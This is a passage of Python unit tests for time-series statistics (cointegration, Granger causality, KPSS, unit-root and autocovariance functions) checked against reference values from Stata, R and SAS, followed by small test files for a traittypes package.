print(coint(y[:, 0], y[:, 1:], trend=trend, maxlag=4, autolag=None))
# results from Stata egranger
res_egranger = {}
# trend = 'ct'
res = res_egranger["ct"] = {}
res[0] = [
-5.615251442239,
-4.406102369132,
-3.82866685109,
-3.532082997903,
]
res[1] = [
-5.63591313706,
-4.758609717199,
-4.179130554708,
-3.880909696863,
]
res[2] = [
-2.892029275027,
-4.758609717199,
-4.179130554708,
-3.880909696863,
]
res[3] = [-5.626932544079, -5.08363327039, -4.502469783057, -4.2031051091]
# trend = 'c'
res = res_egranger["c"] = {}
# first critical value res[0][1] has a discrepancy starting at 4th decimal
res[0] = [
-5.760696844656,
-3.952043522638,
-3.367006313729,
-3.065831247948,
]
# manually adjusted to have higher precision as in other cases
res[0][1] = -3.952321293401682
res[1] = [
-5.781087068772,
-4.367111915942,
-3.783961136005,
-3.483501524709,
]
res[2] = [
-2.477444137366,
-4.367111915942,
-3.783961136005,
-3.483501524709,
]
res[3] = [
-5.778205811661,
-4.735249216434,
-4.152738973763,
-3.852480848968,
]
# trend = 'ctt'
res = res_egranger["ctt"] = {}
res[0] = [
-5.644431269946,
-4.796038299708,
-4.221469431008,
-3.926472577178,
]
res[1] = [-5.665691609506, -5.111158174219, -4.53317278104, -4.23601008516]
res[2] = [-3.161462374828, -5.111158174219, -4.53317278104, -4.23601008516]
res[3] = [
-5.657904558563,
-5.406880189412,
-4.826111619543,
-4.527090164875,
]
# The following for 'n' are only regression test numbers
# trend = 'n' not allowed in egranger
# trend = 'n'
res = res_egranger["n"] = {}
nan = np.nan # shortcut for table
res[0] = [-3.7146175989071137, nan, nan, nan]
res[1] = [-3.8199323012888384, nan, nan, nan]
res[2] = [-1.6865000791270679, nan, nan, nan]
res[3] = [-3.7991270451873675, nan, nan, nan]
with pytest.warns(FutureWarning):
# Ensure warning raised for nc rather than n
coint(y[:, 0], y[:, 1], trend="nc", maxlag=4, autolag=None)
for trend in ["c", "ct", "ctt", "n"]:
res1 = {}
res1[0] = coint(y[:, 0], y[:, 1], trend=trend, maxlag=4, autolag=None)
res1[1] = coint(
y[:, 0], y[:, 1:3], trend=trend, maxlag=4, autolag=None
)
res1[2] = coint(y[:, 0], y[:, 2:], trend=trend, maxlag=4, autolag=None)
res1[3] = coint(y[:, 0], y[:, 1:], trend=trend, maxlag=4, autolag=None)
for i in range(4):
res = res_egranger[trend]
assert_allclose(res1[i][0], res[i][0], rtol=1e-11)
r2 = res[i][1:]
r1 = res1[i][2]
assert_allclose(r1, r2, rtol=0, atol=6e-7)
# use default autolag #4490
res1_0 = coint(y[:, 0], y[:, 1], trend="ct", maxlag=4)
assert_allclose(res1_0[2], res_egranger["ct"][0][1:], rtol=0, atol=6e-7)
# the following is just a regression test
assert_allclose(
res1_0[:2],
[-13.992946638547112, 2.270898990540678e-27],
rtol=1e-10,
atol=1e-27,
)
def test_coint_identical_series():
nobs = 200
scale_e = 1
np.random.seed(123)
y = scale_e * np.random.randn(nobs)
warnings.simplefilter("always", CollinearityWarning)
with pytest.warns(CollinearityWarning):
c = coint(y, y, trend="c", maxlag=0, autolag=None)
assert_equal(c[1], 0.0)
assert_(np.isneginf(c[0]))
def test_coint_perfect_collinearity():
# test uses nearly perfect collinearity
nobs = 200
scale_e = 1
np.random.seed(123)
x = scale_e * np.random.randn(nobs, 2)
y = 1 + x.sum(axis=1) + 1e-7 * np.random.randn(nobs)
warnings.simplefilter("always", CollinearityWarning)
with warnings.catch_warnings(record=True) as w:
c = coint(y, x, trend="c", maxlag=0, autolag=None)
assert_equal(c[1], 0.0)
assert_(np.isneginf(c[0]))
class TestGrangerCausality(object):
def test_grangercausality(self):
# some example data
mdata = macrodata.load_pandas().data
mdata = mdata[["realgdp", "realcons"]].values
data = mdata.astype(float)
data = np.diff(np.log(data), axis=0)
# R: lmtest:grangertest
r_result = [0.243097, 0.7844328, 195, 2] # f_test
gr = grangercausalitytests(data[:, 1::-1], 2, verbose=False)
assert_almost_equal(r_result, gr[2][0]["ssr_ftest"], decimal=7)
assert_almost_equal(
gr[2][0]["params_ftest"], gr[2][0]["ssr_ftest"], decimal=7
)
def test_grangercausality_single(self):
mdata = macrodata.load_pandas().data
mdata = mdata[["realgdp", "realcons"]].values
data = mdata.astype(float)
data = np.diff(np.log(data), axis=0)
gr = grangercausalitytests(data[:, 1::-1], 2, verbose=False)
gr2 = grangercausalitytests(data[:, 1::-1], [2], verbose=False)
assert 1 in gr
assert 1 not in gr2
assert_almost_equal(
gr[2][0]["ssr_ftest"], gr2[2][0]["ssr_ftest"], decimal=7
)
assert_almost_equal(
gr[2][0]["params_ftest"], gr2[2][0]["ssr_ftest"], decimal=7
)
def test_granger_fails_on_nobs_check(self, reset_randomstate):
# Test that if maxlag is too large, Granger Test raises a clear error.
x = np.random.rand(10, 2)
grangercausalitytests(x, 2, verbose=False) # This should pass.
with pytest.raises(ValueError):
grangercausalitytests(x, 3, verbose=False)
def test_granger_fails_on_finite_check(self, reset_randomstate):
x = np.random.rand(1000, 2)
x[500, 0] = np.nan
x[750, 1] = np.inf
with pytest.raises(ValueError, match="x contains NaN"):
grangercausalitytests(x, 2)
def test_granger_fails_on_zero_lag(self, reset_randomstate):
x = np.random.rand(1000, 2)
with pytest.raises(
ValueError,
match="maxlag must be a non-empty list containing only positive integers",
):
grangercausalitytests(x, [0, 1, 2])
class TestKPSS:
"""
R-code
------
library(tseries)
kpss.stat(x, "Level")
kpss.stat(x, "Trend")
In this context, x is the vector containing the
macrodata['realgdp'] series.
"""
@classmethod
def setup(cls):
cls.data = macrodata.load_pandas()
cls.x = cls.data.data["realgdp"].values
def test_fail_nonvector_input(self, reset_randomstate):
# should be fine
with pytest.warns(InterpolationWarning):
kpss(self.x, nlags="legacy")
x = np.random.rand(20, 2)
assert_raises(ValueError, kpss, x)
def test_fail_unclear_hypothesis(self):
# these should be fine,
with pytest.warns(InterpolationWarning):
kpss(self.x, "c", nlags="legacy")
with pytest.warns(InterpolationWarning):
kpss(self.x, "C", nlags="legacy")
with pytest.warns(InterpolationWarning):
kpss(self.x, "ct", nlags="legacy")
with pytest.warns(InterpolationWarning):
kpss(self.x, "CT", nlags="legacy")
assert_raises(
ValueError, kpss, self.x, "unclear hypothesis", nlags="legacy"
)
def test_teststat(self):
with pytest.warns(InterpolationWarning):
kpss_stat, _, _, _ = kpss(self.x, "c", 3)
assert_almost_equal(kpss_stat, 5.0169, DECIMAL_3)
with pytest.warns(InterpolationWarning):
kpss_stat, _, _, _ = kpss(self.x, "ct", 3)
assert_almost_equal(kpss_stat, 1.1828, DECIMAL_3)
def test_pval(self):
with pytest.warns(InterpolationWarning):
_, pval, _, _ = kpss(self.x, "c", 3)
assert_equal(pval, 0.01)
with pytest.warns(InterpolationWarning):
_, pval, _, _ = kpss(self.x, "ct", 3)
assert_equal(pval, 0.01)
def test_store(self):
with pytest.warns(InterpolationWarning):
_, _, _, store = kpss(self.x, "c", 3, True)
# assert attributes, and make sure they're correct
assert_equal(store.nobs, len(self.x))
assert_equal(store.lags, 3)
# test autolag function _kpss_autolag against SAS 9.3
def test_lags(self):
# real GDP from macrodata data set
with pytest.warns(InterpolationWarning):
res = kpss(self.x, "c", nlags="auto")
assert_equal(res[2], 9)
# real interest rates from macrodata data set
res = kpss(sunspots.load().data["SUNACTIVITY"], "c", nlags="auto")
assert_equal(res[2], 7)
# volumes from nile data set
with pytest.warns(InterpolationWarning):
res = kpss(nile.load().data["volume"], "c", nlags="auto")
assert_equal(res[2], 5)
# log-coinsurance from randhie data set
with pytest.warns(InterpolationWarning):
res = kpss(randhie.load().data["lncoins"], "ct", nlags="auto")
assert_equal(res[2], 75)
# in-vehicle time from modechoice data set
with pytest.warns(InterpolationWarning):
res = kpss(modechoice.load().data["invt"], "ct", nlags="auto")
assert_equal(res[2], 18)
def test_kpss_fails_on_nobs_check(self):
# Test that if lags exceeds number of observations KPSS raises a
# clear error
# GH5925
nobs = len(self.x)
msg = r"lags \({}\) must be < number of observations \({}\)".format(
nobs, nobs
)
with pytest.raises(ValueError, match=msg):
kpss(self.x, "c", nlags=nobs)
def test_kpss_autolags_does_not_assign_lags_equal_to_nobs(self):
# Test that if *autolags* exceeds number of observations, we set
# suitable lags
# GH5925
base = np.array([0, 0, 0, 0, 0, 1, 1.0])
data_which_breaks_autolag = np.r_[np.tile(base, 297 // 7), [0, 0, 0]]
kpss(data_which_breaks_autolag, nlags="auto")
def test_legacy_lags(self):
# Test legacy lags are the same
with pytest.warns(InterpolationWarning):
res = kpss(self.x, "c", nlags="legacy")
assert_equal(res[2], 15)
def test_unknown_lags(self):
# Test legacy lags are the same
with pytest.raises(ValueError):
kpss(self.x, "c", nlags="unknown")
def test_none(self):
with pytest.warns(FutureWarning):
kpss(self.x, nlags=None)
class TestRUR:
"""
Simple implementation
------
Since an R implementation of the test cannot be found, the method is tested against
a simple implementation using a for loop.
In this context, x is the vector containing the
macrodata['realgdp'] series.
"""
@classmethod
def setup(cls):
cls.data = macrodata.load_pandas()
cls.x = cls.data.data["realgdp"].values
# To be removed when range unit test gets an R implementation
def simple_rur(self, x, store=False):
x = array_like(x, "x")
store = bool_like(store, "store")
nobs = x.shape[0]
# if m is not one, n != m * n
if nobs != x.size:
raise ValueError("x of shape {0} not understood".format(x.shape))
# Table from [1] has been replicated using 200,000 samples
# Critical values for new n_obs values have been identified
pvals = [0.01, 0.025, 0.05, 0.10, 0.90, 0.95]
n = np.array(
[25, 50, 100, 150, 200, 250, 500, 1000, 2000, 3000, 4000, 5000]
)
crit = np.array(
[
[0.6626, 0.8126, 0.9192, 1.0712, 2.4863, 2.7312],
[0.7977, 0.9274, 1.0478, 1.1964, 2.6821, 2.9613],
[0.907, 1.0243, 1.1412, 1.2888, 2.8317, 3.1393],
[0.9543, 1.0768, 1.1869, 1.3294, 2.8915, 3.2049],
[0.9833, 1.0984, 1.2101, 1.3494, 2.9308, 3.2482],
[0.9982, 1.1137, 1.2242, 1.3632, 2.9571, 3.2482],
[1.0494, 1.1643, 1.2712, 1.4076, 3.0207, 3.3584],
[1.0846, 1.1959, 1.2988, 1.4344, 3.0653, 3.4073],
[1.1121, 1.2200, 1.3230, 1.4556, 3.0948, 3.4439],
[1.1204, 1.2295, 1.3318, 1.4656, 3.1054, 3.4632],
[1.1309, 1.2347, 1.3318, 1.4693, 3.1165, 3.4717],
[1.1377, 1.2402, 1.3408, 1.4729, 3.1252, 3.4807],
]
)
# Interpolation for nobs
inter_crit = np.zeros((1, crit.shape[1]))
for i in range(crit.shape[1]):
f = interp1d(n, crit[:, i])
inter_crit[0, i] = f(nobs)
# Calculate RUR stat
count = 0
max_p = x[0]
min_p = x[0]
for v in x[1:]:
if v > max_p:
max_p = v
count = count + 1
if v < min_p:
min_p = v
count = count + 1
rur_stat = count / np.sqrt(len(x))
k = len(pvals) - 1
for i in range(len(pvals) - 1, -1, -1):
if rur_stat < inter_crit[0, i]:
k = i
else:
break
p_value = pvals[k]
warn_msg = """\
The test statistic is outside of the range of p-values available in the
look-up table. The actual p-value is {direction} than the p-value returned.
"""
direction = ""
if p_value == pvals[-1]:
direction = "smaller"
elif p_value == pvals[0]:
direction = "larger"
if direction:
warnings.warn(
warn_msg.format(direction=direction), InterpolationWarning
)
crit_dict = {
"10%": inter_crit[0, 3],
"5%": inter_crit[0, 2],
"2.5%": inter_crit[0, 1],
"1%": inter_crit[0, 0],
}
if store:
from statsmodels.stats.diagnostic import ResultsStore
rstore = ResultsStore()
rstore.nobs = nobs
rstore.H0 = "The series is not stationary"
rstore.HA = "The series is stationary"
return rur_stat, p_value, crit_dict, rstore
else:
return rur_stat, p_value, crit_dict
def test_fail_nonvector_input(self, reset_randomstate):
with pytest.warns(InterpolationWarning):
range_unit_root_test(self.x)
x = np.random.rand(20, 2)
assert_raises(ValueError, range_unit_root_test, x)
def test_teststat(self):
with pytest.warns(InterpolationWarning):
rur_stat, _, _ = range_unit_root_test(self.x)
simple_rur_stat, _, _ = self.simple_rur(self.x)
assert_almost_equal(rur_stat, simple_rur_stat, DECIMAL_3)
def test_pval(self):
with pytest.warns(InterpolationWarning):
_, pval, _ = range_unit_root_test(self.x)
_, simple_pval, _ = self.simple_rur(self.x)
assert_equal(pval, simple_pval)
def test_store(self):
with pytest.warns(InterpolationWarning):
_, _, _, store = range_unit_root_test(self.x, True)
# assert attributes, and make sure they're correct
assert_equal(store.nobs, len(self.x))
def test_pandasacovf():
s = Series(lrange(1, 11))
assert_almost_equal(acovf(s, fft=False), acovf(s.values, fft=False))
def test_acovf2d(reset_randomstate):
dta = sunspots.load_pandas().data
dta.index = date_range(start="1700", end="2009", freq="A")[:309]
del dta["YEAR"]
res = acovf(dta, fft=False)
assert_equal(res, acovf(dta.values, fft=False))
x = np.random.random((10, 2))
with pytest.raises(ValueError):
acovf(x, fft=False)
@pytest.mark.parametrize("demean", [True, False])
@pytest.mark.parametrize("adjusted", [True, False])
def test_acovf_fft_vs_convolution(demean, adjusted, reset_randomstate):
q = np.random.normal(size=100)
F1 = acovf(q, demean=demean, adjusted=adjusted, fft=True)
F2 = acovf(q, demean=demean, adjusted=adjusted, fft=False)
assert_almost_equal(F1, F2, decimal=7)
@pytest.mark.parametrize("demean", [True, False])
@pytest.mark.parametrize("adjusted", [True, False])
def test_ccovf_fft_vs_convolution(demean, adjusted, reset_randomstate):
x = np.random.normal(size=128)
y = np.random.normal(size=128)
F1 = ccovf(x, y, demean=demean, adjusted=adjusted, fft=False)
F2 = ccovf(x, y, demean=demean, adjusted=adjusted, fft=True)
assert_almost_equal(F1, F2, decimal=7)
@pytest.mark.parametrize("demean", [True, False])
@pytest.mark.parametrize("adjusted", [True, False])
@pytest.mark.parametrize("fft", [True, False])
def test_compare_acovf_vs_ccovf(demean, adjusted, fft, reset_randomstate):
x = np.random.normal(size=128)
F1 = acovf(x, demean=demean, adjusted=adjusted, fft=fft)
F2 = ccovf(x, x, demean=demean, adjusted=adjusted, fft=fft)
assert_almost_equal(F1, F2, decimal=7)
@pytest.mark.smoke
@pytest.mark.slow
def test_arma_order_select_ic():
# smoke test, assumes info-criteria are right
from statsmodels.tsa.arima_process import arma_generate_sample
arparams = np.array([0.75, -0.25])
maparams = np.array([0.65, 0.35])
arparams = np.r_[1, -arparams]
maparam = np.r_[1, maparams] # FIXME: Never used
nobs = 250
np.random.seed(2014)
y = arma_generate_sample(arparams, maparams, nobs)
res = arma_order_select_ic(y, ic=["aic", "bic"], trend="n")
# regression tests in case we change algorithm to minic in sas
aic_x = np.array(
[
[764.36517643, 552.7342255, 484.29687843],
[562.10924262, 485.5197969, 480.32858497],
[507.04581344, 482.91065829, 481.91926034],
[484.03995962, 482.14868032, 483.86378955],
[481.8849479, 483.8377379, 485.83756612],
]
)
bic_x = np.array(
[
[767.88663735, 559.77714733, 494.86126118],
[569.15216446, 496.08417966, 494.41442864],
[517.61019619, 496.99650196, 499.52656493],
[498.12580329, 499.75598491, 504.99255506],
[499.49225249, 504.96650341, 510.48779255],
]
)
aic = DataFrame(aic_x, index=lrange(5), columns=lrange(3))
bic = DataFrame(bic_x, index=lrange(5), columns=lrange(3))
assert_almost_equal(res.aic.values, aic.values, 5)
assert_almost_equal(res.bic.values, bic.values, 5)
assert_equal(res.aic_min_order, (1, 2))
assert_equal(res.bic_min_order, (1, 2))
assert_(res.aic.index.equals(aic.index))
assert_(res.aic.columns.equals(aic.columns))
assert_(res.bic.index.equals(bic.index))
assert_(res.bic.columns.equals(bic.columns))
index = pd.date_range("2000-1-1", freq="M", periods=len(y))
y_series = pd.Series(y, index=index)
res_pd = arma_order_select_ic(
y_series, max_ar=2, max_ma=1, ic=["aic", "bic"], trend="n"
)
assert_almost_equal(res_pd.aic.values, aic.values[:3, :2], 5)
assert_almost_equal(res_pd.bic.values, bic.values[:3, :2], 5)
assert_equal(res_pd.aic_min_order, (2, 1))
assert_equal(res_pd.bic_min_order, (1, 1))
res = arma_order_select_ic(y, ic="aic", trend="n")
assert_almost_equal(res.aic.values, aic.values, 5)
assert_(res.aic.index.equals(aic.index))
assert_(res.aic.columns.equals(aic.columns))
assert_equal(res.aic_min_order, (1, 2))
def test_arma_order_select_ic_failure():
# this should trigger an SVD convergence failure, smoke test that it
# returns, likely platform dependent failure...
# looks like AR roots may be cancelling out for 4, 1?
y = np.array(
[
0.86074377817203640006,
0.85316549067906921611,
0.87104653774363305363,
0.60692382068987393851,
0.69225941967301307667,
0.73336177248909339976,
0.03661329261479619179,
0.15693067239962379955,
0.12777403512447857437,
-0.27531446294481976,
-0.24198139631653581283,
-0.23903317951236391359,
-0.26000241325906497947,
-0.21282920015519238288,
-0.15943768324388354896,
0.25169301564268781179,
0.1762305709151877342,
0.12678133368791388857,
0.89755829086753169399,
0.82667068795350151511,
]
)
import warnings
with warnings.catch_warnings():
# catch a hessian inversion and convergence failure warning
warnings.simplefilter("ignore")
res = arma_order_select_ic(y)
def test_acf_fft_dataframe():
# regression test #322
result = acf(
sunspots.load_pandas().data[["SUNACTIVITY"]], fft=True, nlags=20
)
assert_equal(result.ndim, 1)
def test_levinson_durbin_acov():
rho = 0.9
m = 20
acov = rho ** np.arange(200)
sigma2_eps, ar, pacf, _, _ = levinson_durbin(acov, m, isacov=True)
assert_allclose(sigma2_eps, 1 - rho ** 2)
assert_allclose(ar, np.array([rho] + [0] * (m - 1)), atol=1e-8)
assert_allclose(pacf, np.array([1, rho] + [0] * (m - 1)), atol=1e-8)
@pytest.mark.parametrize("missing", ["conservative", "drop", "raise", "none"])
@pytest.mark.parametrize("fft", [False, True])
@pytest.mark.parametrize("demean", [True, False])
@pytest.mark.parametrize("adjusted", [True, False])
def test_acovf_nlags(acovf_data, adjusted, demean, fft, missing):
full = acovf(
acovf_data, adjusted=adjusted, demean=demean, fft=fft, missing=missing
)
limited = acovf(
acovf_data,
adjusted=adjusted,
demean=demean,
fft=fft,
missing=missing,
nlag=10,
)
assert_allclose(full[:11], limited)
@pytest.mark.parametrize("missing", ["conservative", "drop"])
@pytest.mark.parametrize("fft", [False, True])
@pytest.mark.parametrize("demean", [True, False])
@pytest.mark.parametrize("adjusted", [True, False])
def test_acovf_nlags_missing(acovf_data, adjusted, demean, fft, missing):
acovf_data = acovf_data.copy()
acovf_data[1:3] = np.nan
full = acovf(
acovf_data, adjusted=adjusted, demean=demean, fft=fft, missing=missing
)
limited = acovf(
acovf_data,
adjusted=adjusted,
demean=demean,
fft=fft,
missing=missing,
nlag=10,
)
assert_allclose(full[:11], limited)
def test_acovf_error(acovf_data):
with pytest.raises(ValueError):
acovf(acovf_data, nlag=250, fft=False)
def test_pacf2acf_ar():
pacf = np.zeros(10)
pacf[0] = 1
pacf[1] = 0.9
ar, acf = levinson_durbin_pacf(pacf)
assert_allclose(acf, 0.9 ** np.arange(10.0))
assert_allclose(ar, pacf[1:], atol=1e-8)
ar, acf = levinson_durbin_pacf(pacf, nlags=5)
assert_allclose(acf, 0.9 ** np.arange(6.0))
assert_allclose(ar, pacf[1:6], atol=1e-8)
def test_pacf2acf_levinson_durbin():
pacf = -(0.9 ** np.arange(11.0))
pacf[0] = 1
ar, acf = levinson_durbin_pacf(pacf)
_, ar_ld, pacf_ld, _, _ = levinson_durbin(acf, 10, isacov=True)
assert_allclose(ar, ar_ld, atol=1e-8)
assert_allclose(pacf, pacf_ld, atol=1e-8)
# From R, FitAR, PacfToAR
ar_from_r = [
-4.1609,
-9.2549,
-14.4826,
-17.6505,
-17.5012,
-14.2969,
-9.5020,
-4.9184,
-1.7911,
-0.3486,
]
assert_allclose(ar, ar_from_r, atol=1e-4)
def test_pacf2acf_errors():
pacf = -(0.9 ** np.arange(11.0))
pacf[0] = 1
with pytest.raises(ValueError):
levinson_durbin_pacf(pacf, nlags=20)
with pytest.raises(ValueError):
levinson_durbin_pacf(pacf[1:])
with pytest.raises(ValueError):
levinson_durbin_pacf(np.zeros(10))
with pytest.raises(ValueError):
levinson_durbin_pacf(np.zeros((10, 2)))
def test_pacf_burg():
rnd = np.random.RandomState(12345)
e = rnd.randn(10001)
y = e[1:] + 0.5 * e[:-1]
pacf, sigma2 = pacf_burg(y, 10)
yw_pacf = pacf_yw(y, 10)
assert_allclose(pacf, yw_pacf, atol=5e-4)
# Internal consistency check between pacf and sigma2
ye = y - y.mean()
s2y = ye.dot(ye) / 10000
pacf[0] = 0
sigma2_direct = s2y * np.cumprod(1 - pacf ** 2)
assert_allclose(sigma2, sigma2_direct, atol=1e-3)
def test_pacf_burg_error():
with pytest.raises(ValueError):
pacf_burg(np.empty((20, 2)), 10)
with pytest.raises(ValueError):
pacf_burg(np.empty(100), 101)
def test_innovations_algo_brockwell_davis():
ma = -0.9
acovf = np.array([1 + ma ** 2, ma])
theta, sigma2 = innovations_algo(acovf, nobs=4)
exp_theta = np.array([[0], [-0.4972], [-0.6606], [-0.7404]])
assert_allclose(theta, exp_theta, rtol=1e-4)
assert_allclose(sigma2, [1.81, 1.3625, 1.2155, 1.1436], rtol=1e-4)
theta, sigma2 = innovations_algo(acovf, nobs=500)
assert_allclose(theta[-1, 0], ma)
assert_allclose(sigma2[-1], 1.0)
def test_innovations_algo_rtol():
ma = np.array([-0.9, 0.5])
acovf = np.array([1 + (ma ** 2).sum(), ma[0] + ma[1] * ma[0], ma[1]])
theta, sigma2 = innovations_algo(acovf, nobs=500)
theta_2, sigma2_2 = innovations_algo(acovf, nobs=500, rtol=1e-8)
assert_allclose(theta, theta_2)
assert_allclose(sigma2, sigma2_2)
def test_innovations_errors():
ma = -0.9
acovf = np.array([1 + ma ** 2, ma])
with pytest.raises(TypeError):
innovations_algo(acovf, nobs=2.2)
with pytest.raises(ValueError):
innovations_algo(acovf, nobs=-1)
with pytest.raises(ValueError):
innovations_algo(np.empty((2, 2)))
with pytest.raises(TypeError):
innovations_algo(acovf, rtol="none")
def test_innovations_filter_brockwell_davis(reset_randomstate):
ma = -0.9
acovf = np.array([1 + ma ** 2, ma])
theta, _ = innovations_algo(acovf, nobs=4)
e = np.random.randn(5)
endog = e[1:] + ma * e[:-1]
resid = innovations_filter(endog, theta)
expected = [endog[0]]
for i in range(1, 4):
expected.append(endog[i] - theta[i, 0] * expected[-1])
expected = np.array(expected)
assert_allclose(resid, expected)
def test_innovations_filter_pandas(reset_randomstate):
ma = np.array([-0.9, 0.5])
acovf = np.array([1 + (ma ** 2).sum(), ma[0] + ma[1] * ma[0], ma[1]])
theta, _ = innovations_algo(acovf, nobs=10)
endog = np.random.randn(10)
endog_pd = pd.Series(endog, index=pd.date_range("2000-01-01", periods=10))
resid = innovations_filter(endog, theta)
resid_pd = innovations_filter(endog_pd, theta)
assert_allclose(resid, resid_pd.values)
assert_index_equal(endog_pd.index, resid_pd.index)
def test_innovations_filter_errors():
ma = -0.9
acovf = np.array([1 + ma ** 2, ma])
theta, _ = innovations_algo(acovf, nobs=4)
with pytest.raises(ValueError):
innovations_filter(np.empty((2, 2)), theta)
with pytest.raises(ValueError):
innovations_filter(np.empty(4), theta[:-1])
with pytest.raises(ValueError):
innovations_filter(pd.DataFrame(np.empty((1, 4))), theta)
def test_innovations_algo_filter_kalman_filter(reset_randomstate):
# Test the innovations algorithm and filter against the Kalman filter
# for exact likelihood evaluation of an ARMA process
ar_params = np.array([0.5])
ma_params = np.array([0.2])
# TODO could generalize to sigma2 != 1, if desired, after #5324 is merged
# and there is a sigma2 argument to arma_acovf
# (but maybe this is not really necessary for the point of this test)
sigma2 = 1
endog = np.random.normal(size=10)
# Innovations algorithm approach
acovf = arma_acovf(
np.r_[1, -ar_params], np.r_[1, ma_params], nobs=len(endog)
)
theta, v = innovations_algo(acovf)
u = innovations_filter(endog, theta)
llf_obs = -0.5 * u ** 2 / (sigma2 * v) - 0.5 * np.log(2 * np.pi * v)
# Kalman filter approach
mod = SARIMAX(endog, order=(len(ar_params), 0, len(ma_params)))
res = mod.filter(np.r_[ar_params, ma_params, sigma2])
# Test that the two approaches are identical
atol = 1e-6 if PLATFORM_WIN else 0.0
assert_allclose(u, res.forecasts_error[0], rtol=1e-6, atol=atol)
assert_allclose(
theta[1:, 0], res.filter_results.kalman_gain[0, 0, :-1], atol=atol
)
assert_allclose(llf_obs, res.llf_obs, atol=atol)
def test_adfuller_short_series(reset_randomstate):
y = np.random.standard_normal(7)
res = adfuller(y, store=True)
assert res[-1].maxlag == 1
y = np.random.standard_normal(2)
with pytest.raises(ValueError, match="sample size is too short"):
adfuller(y)
y = np.random.standard_normal(3)
with pytest.raises(ValueError, match="sample size is too short"):
adfuller(y, regression="ct")
def test_adfuller_maxlag_too_large(reset_randomstate):
y = np.random.standard_normal(100)
with pytest.raises(ValueError, match="maxlag must be less than"):
adfuller(y, maxlag=51)
class SetupZivotAndrews(object):
# test directory
cur_dir = CURR_DIR
run_dir = os.path.join(cur_dir, "results")
# use same file for testing failure modes
fail_file = os.path.join(run_dir, "rgnp.csv")
fail_mdl = np.asarray(pd.read_csv(fail_file))
class TestZivotAndrews(SetupZivotAndrews):
# failure mode tests
def test_fail_regression_type(self):
with pytest.raises(ValueError):
zivot_andrews(self.fail_mdl, regression="x")
def test_fail_trim_value(self):
with pytest.raises(ValueError):
zivot_andrews(self.fail_mdl, trim=0.5)
def test_fail_array_shape(self):
with pytest.raises(ValueError):
zivot_andrews(np.random.rand(50, 2))
def test_fail_autolag_type(self):
with pytest.raises(ValueError):
zivot_andrews(self.fail_mdl, autolag="None")
@pytest.mark.parametrize("autolag", ["AIC", "aic", "Aic"])
def test_autolag_case_sensitivity(self, autolag):
res = zivot_andrews(self.fail_mdl, autolag=autolag)
assert res[3] == 1
# following tests compare results to R package urca.ur.za (1.13-0)
def test_rgnp_case(self):
res = zivot_andrews(
self.fail_mdl, maxlag=8, regression="c", autolag=None
)
assert_allclose(
[res[0], res[1], res[4]], [-5.57615, 0.00312, 20], rtol=1e-3
)
def test_gnpdef_case(self):
mdlfile = os.path.join(self.run_dir, "gnpdef.csv")
mdl = np.asarray(pd.read_csv(mdlfile))
res = zivot_andrews(mdl, maxlag=8, regression="c", autolag="t-stat")
assert_allclose(
[res[0], res[1], res[3], res[4]],
[-4.12155, 0.28024, 5, 40],
rtol=1e-3,
)
def test_stkprc_case(self):
mdlfile = os.path.join(self.run_dir, "stkprc.csv")
mdl = np.asarray(pd.read_csv(mdlfile))
res = zivot_andrews(mdl, maxlag=8, regression="ct", autolag="t-stat")
assert_allclose(
[res[0], res[1], res[3], res[4]],
[-5.60689, 0.00894, 1, 65],
rtol=1e-3,
)
def test_rgnpq_case(self):
mdlfile = os.path.join(self.run_dir, "rgnpq.csv")
mdl = np.asarray(pd.read_csv(mdlfile))
res = zivot_andrews(mdl, maxlag=12, regression="t", autolag="t-stat")
assert_allclose(
[res[0], res[1], res[3], res[4]],
[-3.02761, 0.63993, 12, 102],
rtol=1e-3,
)
def test_rand10000_case(self):
mdlfile = os.path.join(self.run_dir, "rand10000.csv")
mdl = np.asarray(pd.read_csv(mdlfile))
res = zivot_andrews(mdl, regression="c", autolag="t-stat")
assert_allclose(
[res[0], res[1], res[3], res[4]],
[-3.48223, 0.69111, 25, 7071],
rtol=1e-3,
)
def test_acf_conservate_nanops(reset_randomstate):
# GH 6729
e = np.random.standard_normal(100)
for i in range(1, e.shape[0]):
e[i] += 0.9 * e[i - 1]
e[::7] = np.nan
result = acf(e, missing="conservative", nlags=10, fft=False)
resid = e - np.nanmean(e)
expected = np.ones(11)
nobs = e.shape[0]
gamma0 = np.nansum(resid * resid)
for i in range(1, 10 + 1):
expected[i] = np.nansum(resid[i:] * resid[: nobs - i]) / gamma0
assert_allclose(result, expected, rtol=1e-4, atol=1e-4)
def test_pacf_nlags_error(reset_randomstate):
e = np.random.standard_normal(100)
with pytest.raises(ValueError, match="Can only compute partial"):
pacf(e, 50)
def test_coint_auto_tstat():
rs = np.random.RandomState(3733696641)
x = np.cumsum(rs.standard_normal(100))
y = np.cumsum(rs.standard_normal(100))
res = coint(
x,
y,
trend="c",
method="aeg",
maxlag=0,
autolag="t-stat",
return_results=False,
)
assert np.abs(res[0]) < 1.65
rs = np.random.RandomState(1)
a = rs.random_sample(120)
b = np.zeros_like(a)
df1 = pd.DataFrame({"b": b, "a": a})
df2 = pd.DataFrame({"a": a, "b": b})
b = np.ones_like(a)
df3 = pd.DataFrame({"b": b, "a": a})
df4 = pd.DataFrame({"a": a, "b": b})
gc_data_sets = [df1, df2, df3, df4]
@pytest.mark.parametrize("dataset", gc_data_sets)
def test_granger_causality_exceptions(dataset):
with pytest.raises(InfeasibleTestError):
grangercausalitytests(dataset, 4)
```
#### File: traittypes/tests/test_import_errors.py
```python
import nose.tools as nt
from ..traittypes import _DelayedImportError
@nt.raises(RuntimeError)
def test_delayed_access_raises():
dummy = _DelayedImportError('mypackage')
dummy.asarray([1, 2, 3])
```
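The test above only exercises the failure path: any attribute access on `_DelayedImportError` must raise `RuntimeError`. As a rough sketch of the pattern being tested (a hypothetical illustration, not the actual `traittypes` implementation), a delayed-import placeholder can be written as:
```python
# Hypothetical sketch of a delayed-import placeholder (not the traittypes source).
# Attribute access reports that the optional dependency is missing instead of
# failing at import time.
class DelayedImportError(object):
    def __init__(self, package_name):
        self._package_name = package_name  # name of the missing package

    def __getattr__(self, name):
        raise RuntimeError(
            "Missing dependency: %s is required for this trait type"
            % self._package_name
        )
```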
#### File: traittypes/tests/test_traittypes.py
```python
from unittest import TestCase
from traitlets import HasTraits, TraitError, observe, Undefined
from traitlets.tests.test_traitlets import TraitTestBase
from traittypes import Array, DataFrame, Series, Dataset, DataArray
import numpy as np
import pandas as pd
import xarray as xr
# Good / Bad value trait test cases
class IntArrayTrait(HasTraits):
value = Array().tag(dtype=np.int)
class TestIntArray(TraitTestBase):
"""
Test dtype validation with a ``dtype=np.int``
"""
